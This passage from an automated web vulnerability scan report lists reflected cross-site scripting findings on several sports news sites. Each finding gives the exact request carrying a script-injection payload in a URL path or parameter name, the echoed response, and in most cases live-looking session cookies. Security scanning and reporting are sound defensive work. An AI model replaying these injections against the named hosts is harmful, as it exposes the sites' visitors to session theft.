Date: Sun, 19 Dec 2010 18:32:53 GMT
Content-Length: 758
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages9ce55<script>alert(1)</script>1176dc7b761/landing2"</strong>
...[SNIP]...

2.383. http://www.csnnw.com/pages/landing2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/landing2

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4526<script>alert(1)</script>f2e0763ea76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing2e4526<script>alert(1)</script>f2e0763ea76 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:53 GMT
Content-Length: 777
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/landing2e4526<script>alert(1)</script>f2e0763ea76"</strong>
...[SNIP]...

2.384. http://www.csnnw.com/pages/landing2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/landing2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d02"><script>alert(1)</script>29dc0cc948d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing2?f9d02"><script>alert(1)</script>29dc0cc948d=1 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 20663
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web3.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="f9d02"><script>alert(1)</script>29dc0cc948d" id = "f9d02">
...[SNIP]...

2.385. http://www.csnnw.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cdcb<script>alert(1)</script>661668aa0e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages8cdcb<script>alert(1)</script>661668aa0e6/main HTTP/1.1
Host: www.csnnw.com
Proxy-Connection: keep-alive
Referer: http://www.csnnw.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:55 GMT
Connection: close
Content-Length: 754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages8cdcb<script>alert(1)</script>661668aa0e6/main"</strong>
...[SNIP]...

2.386. http://www.csnnw.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47ca6<script>alert(1)</script>62b1953de4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/main47ca6<script>alert(1)</script>62b1953de4a HTTP/1.1
Host: www.csnnw.com
Proxy-Connection: keep-alive
Referer: http://www.csnnw.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:55 GMT
Connection: close
Content-Length: 773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/main47ca6<script>alert(1)</script>62b1953de4a"</strong>
...[SNIP]...

2.387. http://www.csnnw.com/pages/main [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430da"><script>alert(1)</script>df368c64873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?430da"><script>alert(1)</script>df368c64873=1 HTTP/1.1
Host: www.csnnw.com
Proxy-Connection: keep-alive
Referer: http://www.csnnw.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=b74dbfc4beaa0a52e9b01f317379504e; path=/
Vary: Accept-Encoding
Expires: Sun, 19 Dec 2010 18:37:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:55 GMT
Connection: close
Content-Length: 30241

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="430da"><script>alert(1)</script>df368c64873" id = "430da">
...[SNIP]...

2.388. http://www.csnphilly.com/pages/pieceoftheaction [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnphilly.com
Path:   /pages/pieceoftheaction

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"><script>alert(1)</script>1fab6110a99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/pieceoftheaction?3eff8"><script>alert(1)</script>1fab6110a99=1 HTTP/1.1
Host: www.csnphilly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292783247.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_371fe082cd8f81613d5b8cd9b4b6f372=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=32252f2d10a66f5d238cc24ea19b0d85; __utma=1.184438490.1292783247.1292783247.1292783247.1; __utmc=1; base_domain_371fe082cd8f81613d5b8cd9b4b6f372=www.csnphilly.com; __utmb=1;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 34650
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="3eff8"><script>alert(1)</script>1fab6110a99" id = "3eff8">
...[SNIP]...

2.389. http://www.csnphilly.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnphilly.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf91"><script>alert(1)</script>0bebc40a1f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?caf91"><script>alert(1)</script>0bebc40a1f2=1 HTTP/1.1
Host: www.csnphilly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292783247.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_371fe082cd8f81613d5b8cd9b4b6f372=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=32252f2d10a66f5d238cc24ea19b0d85; __utma=1.184438490.1292783247.1292783247.1292783247.1; __utmc=1; base_domain_371fe082cd8f81613d5b8cd9b4b6f372=www.csnphilly.com; __utmb=1;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 60623
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:17 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="caf91"><script>alert(1)</script>0bebc40a1f2" id = "caf91">
...[SNIP]...

2.390. http://www.csnwashington.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4747<script>alert(1)</script>81e3b388902 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmle4747<script>alert(1)</script>81e3b388902 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:09 GMT
Content-Length: 825
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmle4747<script>alert(1)</script>81e3b388902"</strong>
...[SNIP]...

2.391. http://www.csnwashington.com/12/17/10/Caps-Green-Were-going-to-be-alright/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/Caps-Green-Were-going-to-be-alright/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e72ae<script>alert(1)</script>69aa27d8c3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Caps-Green-Were-going-to-be-alright/landing.htmle72ae<script>alert(1)</script>69aa27d8c3d HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:11 GMT
Content-Length: 817
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Caps-Green-Were-going-to-be-alright/landing.htmle72ae<script>alert(1)</script>69aa27d8c3d"</strong>
...[SNIP]...

2.392. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 86e44<script>alert(1)</script>ee28401b9af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html86e44<script>alert(1)</script>ee28401b9af HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:13 GMT
Content-Length: 821
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html86e44<script>alert(1)</script>ee28401b9af"</strong>
...[SNIP]...

2.393. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 810eb<script>alert(1)</script>463820b7e21 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html810eb<script>alert(1)</script>463820b7e21 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:14 GMT
Content-Length: 822
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html810eb<script>alert(1)</script>463820b7e21"</strong>
...[SNIP]...

2.394. http://www.csnwashington.com/12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae2e4<script>alert(1)</script>694e29fae1f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.htmlae2e4<script>alert(1)</script>694e29fae1f HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:17 GMT
Content-Length: 829
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.htmlae2e4<script>alert(1)</script>694e29fae1f"</strong>
...[SNIP]...

2.395. http://www.csnwashington.com/12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1cf9f<script>alert(1)</script>910529ad9b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html1cf9f<script>alert(1)</script>910529ad9b0 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:16 GMT
Content-Length: 821
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html1cf9f<script>alert(1)</script>910529ad9b0"</strong>
...[SNIP]...

2.396. http://www.csnwashington.com/12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 602eb<script>alert(1)</script>b4485f03e1a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html602eb<script>alert(1)</script>b4485f03e1a HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:12:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:08 GMT
Content-Length: 822
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html602eb<script>alert(1)</script>b4485f03e1a"</strong>
...[SNIP]...

2.397. http://www.csnwashington.com/12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73813<script>alert(1)</script>f903369748a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html73813<script>alert(1)</script>f903369748a HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:18 GMT
Content-Length: 825
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html73813<script>alert(1)</script>f903369748a"</strong>
...[SNIP]...

2.398. http://www.csnwashington.com/12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6c865<script>alert(1)</script>eb6007e3c23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html6c865<script>alert(1)</script>eb6007e3c23 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:23 GMT
Content-Length: 823
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html6c865<script>alert(1)</script>eb6007e3c23"</strong>
...[SNIP]...

2.399. http://www.csnwashington.com/12/18/10/Beninati-Fault-in-first/landing_joeb.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/18/10/Beninati-Fault-in-first/landing_joeb.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ead3c<script>alert(1)</script>3aa3c2fdf71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Beninati-Fault-in-first/landing_joeb.htmlead3c<script>alert(1)</script>3aa3c2fdf71 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 810
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Beninati-Fault-in-first/landing_joeb.htmlead3c<script>alert(1)</script>3aa3c2fdf71"</strong>
...[SNIP]...

2.400. http://www.csnwashington.com/12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnwashington.com
Path:   /12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83bb0<script>alert(1)</script>79422940834 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html83bb0<script>alert(1)</script>79422940834 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
